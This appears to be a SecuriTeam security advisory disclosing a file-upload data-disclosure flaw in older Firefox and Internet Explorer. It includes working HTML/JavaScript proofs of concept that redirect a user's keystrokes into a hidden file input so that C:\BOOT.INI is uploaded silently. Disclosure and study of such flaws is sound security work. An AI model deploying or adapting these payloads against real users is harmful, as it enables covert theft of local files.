[NEWS] Multiple Browsers File Upload Data Disclosure



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

Multiple Browsers File Upload Data Disclosure
------------------------------------------------------------------------


SUMMARY

"file select - This control type allows the user to select files so that
their contents may be submitted with a form. The INPUT element is used to
create a file select control."
(W3C HTML 4.01 specification, http://www.w3.org/TR/html4/interact/forms.html#file-select)

A keyboard handling feature in multiple browsers allows attackers to
retrieve sensitive information from the client by abusing the file upload
control in web browsers.

DETAILS

Vulnerable Systems:
* Mozilla Firefox 1.5.0.3 and prior
* Internet Explorer 7 and prior

The problem exists in both Internet Explorer and Firefox. An attacker's page
can filter the keystrokes a user enters in a form, 'bounce' each accepted
character over to the file input box, and then bounce focus back to the text
entry the user was typing in, so it appears as if nothing has happened.

By doing so, attackers can upload sensitive files from the client computer
without user intervention and without the user's knowledge.

Firefox Proof of Concept:
/*
Instructions:
Copy and paste this into an editor. Load it in Firefox. Click in the text box
on the right pane. Type the letter 'c' and notice it appears in the file input
box. Press the letter 'a' and notice it does not appear. Press ':' and it
appears. The page will filter out the string "c:\boot.ini".
*/
<HTML>
<HEAD>
<style type="text/css">
/* class names toggled by the "visible"/"invisible" buttons below */
.first {
}
/* 'second' hides the file input: white on white and fully transparent */
.second {
    color: white;
    background-color: white;
    opacity: 0;
}
</style>
<SCRIPT>
var saved;                      // last key code seen by the file input
var mystring = "C:\\BOOT.INI";  // path the attacker wants to read
var i = 0;                      // index of the next expected character

// keypress handler on the file input: let the key through only if it is
// the next character of mystring; every other key is swallowed
function doKeyPress(chucky)
{
    saved = chucky.which;
    if (i > mystring.length - 1 ||
        mystring[i] != String.fromCharCode(saved).toUpperCase()) {
        return false;
    }
    i++;
    return true;
}

// keyup handler on the file input: echo the typed character into the
// visible text box and move focus back to it, so the user sees normal typing
function doKeyUp() {
    document.forms[0].txt.value += String.fromCharCode(saved);
    document.forms[0].txt.focus();
}
</SCRIPT>
</HEAD>
<BODY>
<FORM METHOD=POST action=file.php>
  <!-- the file input receives the filtered keystrokes -->
  <INPUT id='asdf' name="fileupload" defaultValue='asdfasdf' TYPE=FILE
         OnKeyUp="doKeyUp();"
         OnKeyPress="return doKeyPress(event);">
  <!-- the visible text box; every keydown moves focus to the file input -->
  <input name=txt id='txt' type=text value=''
         OnKeyDown="document.forms[0].fileupload.focus();">
  <input type=button value="invisible"
         onclick="document.forms[0].fileupload.className='second';">
  <input type=button value="visible"
         onclick="document.forms[0].fileupload.className='first';">
</FORM>
</BODY>
</HTML>

Internet Explorer Proof of Concept:
/*
Description: Same trick as above, for Internet Explorer.
Instructions: turn on CAPS LOCK (lame). Click in the text box. Press 'I',
press 'N', press 'I', press '.' and so on; the string is matched from its
last character backwards, so it is typed in reverse. The page will filter
out C:\BOOT.INI.
*/
<HTML>
<HEAD>
<SCRIPT>
var saved;                      // last key code seen by the file input
var e;                          // IE's global window.event
var mystring = "C:\\BOOT.INI";  // path the attacker wants to read
var i = mystring.length - 1;    // matched from the last character backwards

// keypress handler on the file input: cancel the key unless it is the
// next expected character of mystring (IE puts the char code in keyCode)
function doKeyPress() {
    e = window.event;
    saved = e.keyCode;
    window.status = "e.keyCode == " + e.keyCode + " character is " +
                    mystring.charCodeAt(i);
    if (e.keyCode != mystring.charCodeAt(i)) {
        e.returnValue = false;
        e.cancelBubble = true;
    } else {
        i--;
    }
    document.forms[0].fileupload.focus();
}

// keyup handler on the file input: echo the typed character into the
// visible text box and move focus back to it
function doKeyUp() {
    document.forms[0].txt.value += String.fromCharCode(saved);
    document.forms[0].txt.focus();
}
</SCRIPT>
</HEAD>
<BODY onload="document.forms[0].txt.value='sometext';
              document.forms[0].fileupload.value='asdfsdfadsf';">
<FORM METHOD=POST action=file.php>
  <!-- the file input receives the filtered keystrokes -->
  <INPUT id='asdf' name="fileupload" defaultValue='asdfasdf' TYPE=FILE
         OnKeyUp="doKeyUp();"
         OnKeyPress="doKeyPress();">
  <!-- the visible text box; every keydown moves focus to the file input -->
  <input name=txt id='txt' type=text value='asdfsdafasdf'
         OnKeyDown="document.forms[0].fileupload.focus();"> visible
</FORM>
</BODY>
</HTML>

Vendor Status:
Microsoft Response: "Thank you, we'll put it in IE 7.
p.s. you might want to check in with firefox, i think someone reported
this a few years ago and they were vulnerable too.
kthxbye"

Mozilla Response:
A. "This will be fixed in Firefox 1.5 Beta -- see bug 258875. Two reasons
the fix took so long are (1) other browsers are also vulnerable and (2)
the only real fix, not letting users edit the filename field directly,
reduces usability in the non-attack case."

B. "I was wrong when I said "This will be fixed in Firefox 1.5 Beta". It
is fixed on trunk (for Firefox 3 at least), but it wasn't fixed in Firefox
1.5.0.0.

*** This bug has been marked as a duplicate of 258875 ***"


ADDITIONAL INFORMATION

The information has been provided by
<mailto:cmcauley@xxxxxxxxxxxxxxxxxxxxx> Charles McAuley.
Bugzilla Bug Reports:
https://bugzilla.mozilla.org/show_bug.cgi?id=56236
https://bugzilla.mozilla.org/show_bug.cgi?id=258875


